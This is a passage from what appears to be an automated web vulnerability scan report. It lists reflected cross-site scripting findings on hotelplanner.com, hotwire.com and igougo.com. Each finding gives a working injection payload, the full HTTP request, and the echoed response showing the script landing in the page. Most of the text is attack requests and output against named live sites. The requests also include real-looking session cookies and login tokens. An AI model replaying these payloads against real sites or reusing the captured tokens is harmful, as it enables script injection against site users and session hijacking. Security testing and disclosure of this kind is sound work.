Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
layCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=Hc5b26"><script>alert(1)</script>f30d5227f91&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58769

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="supplierType" value="Hc5b26"><script>alert(1)</script>f30d5227f91">
...[SNIP]...

4.321. https://www.hotelplanner.com/Accept/Reserve.cfm [taxRate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the taxRate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8125b"><script>alert(1)</script>ab3b4aef7b8 was submitted in the taxRate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.998125b"><script>alert(1)</script>ab3b4aef7b8&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="taxRate" value="205.998125b"><script>alert(1)</script>ab3b4aef7b8">
...[SNIP]...

4.322. http://www.hotwire.com/hotel/results.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/results.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4bac"-alert(1)-"6cd1c47228b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotele4bac"-alert(1)-"6cd1c47228b/results.jsp?actionType=999&isAjaxRequest=true&pageDef=tiles-def.hotel.results&rerender=results&rerender=tabs_resultTabsTile&rerender=A1&rerender=A3&rerender=A5&rerender=B1&rerender=B2&rerender=B4&rerender=B5&rerender=shoppingtools&rerender=disclaimerText HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//GfFEXccZLnQ9cx0NaloS+foj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f; hotwirePageModuleState=pgoodCode=H&searchTokenId=1; hwAnalytics_previousPageName=hotel.results; hwAnalytics_crossPageVariables=%7B%22eVar34%22%3A%22HUL01-04%2CDPTTD-02%2CFLU01-01%2CSPH01-08%2CRPT01-00%2CLCP01-01%2CMED01-01%2CSOD01-01%2CHRSPP-01%2CHKY01-00%2CHTA01-00%2CHRPAD-01%22%7D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:40:21 GMT
Content-Length: 56978


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta
...[SNIP]...
<script>
window.serverSideGlobalPassThrough = {//Dynamically write out browser information from the server...
pageTileDefinition: "/jsp/hotele4bac"-alert(1)-"6cd1c47228b/results.jsp",
partnerReferral:false,
dateFormat:"MM/dd/yy",
dateFormatMonthNames:["January","February","March","April","May","June","July","August","September","October","Novem
...[SNIP]...

4.323. http://www.igougo.com/WebResource.axd [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The value of the d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d821c"style%3d"x%3aexpression(alert(1))"7f41f0c9b18 was submitted in the d parameter. This input was echoed as d821c"style="x:expression(alert(1))"7f41f0c9b18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2d821c"style%3d"x%3aexpression(alert(1))"7f41f0c9b18&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:29:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36907


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<base href="http://www.igougo.com/WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2d821c"style="x:expression(alert(1))"7f41f0c9b18&t=634196339417056915" />
...[SNIP]...

4.324. http://www.igougo.com/WebResource.axd [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5532"style%3d"x%3aexpression(alert(1))"7d535dff8eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5532"style="x:expression(alert(1))"7d535dff8eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915&b5532"style%3d"x%3aexpression(alert(1))"7d535dff8eb=1 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36913


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<base href="http://www.igougo.com/WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915&b5532"style="x:expression(alert(1))"7d535dff8eb=1" />
...[SNIP]...

4.325. http://www.igougo.com/WebResource.axd [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12d40"style%3d"x%3aexpression(alert(1))"fa3fad8208d was submitted in the t parameter. This input was echoed as 12d40"style="x:expression(alert(1))"fa3fad8208d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=63419633941705691512d40"style%3d"x%3aexpression(alert(1))"fa3fad8208d HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36901


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<base href="http://www.igougo.com/WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=63419633941705691512d40"style="x:expression(alert(1))"fa3fad8208d" />
...[SNIP]...

4.326. http://www.igougo.com/traveldeals/ratefinder.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41537'%20a%3db%2041752f85467 was submitted in the REST URL parameter 1. This input was echoed as 41537' a=b 41752f85467 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /traveldeals41537'%20a%3db%2041752f85467/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 03 Oct 2011 00:38:14 GMT
Connection: close
X-Strangeloop: Compression
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Content-Length: 33076


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<input name="currentPage" type="hidden" value='/traveldeals41537' a=b 41752f85467/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011'/>
...[SNIP]...

4.327. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the SourceID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bff1"style%3d"x%3aexpression(alert(1))"d3584fe9f61 was submitted in the SourceID parameter. This input was echoed as 3bff1"style="x:expression(alert(1))"d3584fe9f61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder3bff1"style%3d"x%3aexpression(alert(1))"d3584fe9f61&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:39:52 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder3bff1"style="x:expression(alert(1))"d3584fe9f61&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...

4.328. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the SourceID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da8d5'%3balert(1)//6e4526513fd was submitted in the SourceID parameter. This input was echoed as da8d5';alert(1)//6e4526513fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunderda8d5'%3balert(1)//6e4526513fd&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:30:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78306


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<script type="text/javascript">

tabsClass.addTabs("tabsContainer");

RFGlobal.region = 'US';
RFGlobal.isIntl = false;
RFGlobal.pageType = 'TVLY-dRF-Popunderda8d5';alert(1)//6e4526513fd';
RFGlobal.isDomesticIP = true;
RFGlobal.locID = 518;

RFGlobal.isSearchValid = true;
RFGlobal.randProviders = false;
RFGlobal.isStandalone = true;
RFGlobal.lobSelected
...[SNIP]...

4.329. http://www.igougo.com/traveldeals/ratefinder.aspx [TypeID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the TypeID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22b4d"style%3d"x%3aexpression(alert(1))"235c9187834 was submitted in the TypeID parameter. This input was echoed as 22b4d"style="x:expression(alert(1))"235c9187834 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=122b4d"style%3d"x%3aexpression(alert(1))"235c9187834&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:28:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 80299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=122b4d"style="x:expression(alert(1))"235c9187834&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...

4.330. http://www.igougo.com/traveldeals/ratefinder.aspx [adlt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the adlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60d36"style%3d"x%3aexpression(alert(1))"095b2ea4122 was submitted in the adlt parameter. This input was echoed as 60d36"style="x:expression(alert(1))"095b2ea4122 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=160d36"style%3d"x%3aexpression(alert(1))"095b2ea4122&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:31:38 GMT
Content-Type: text/html; charset=utf-8
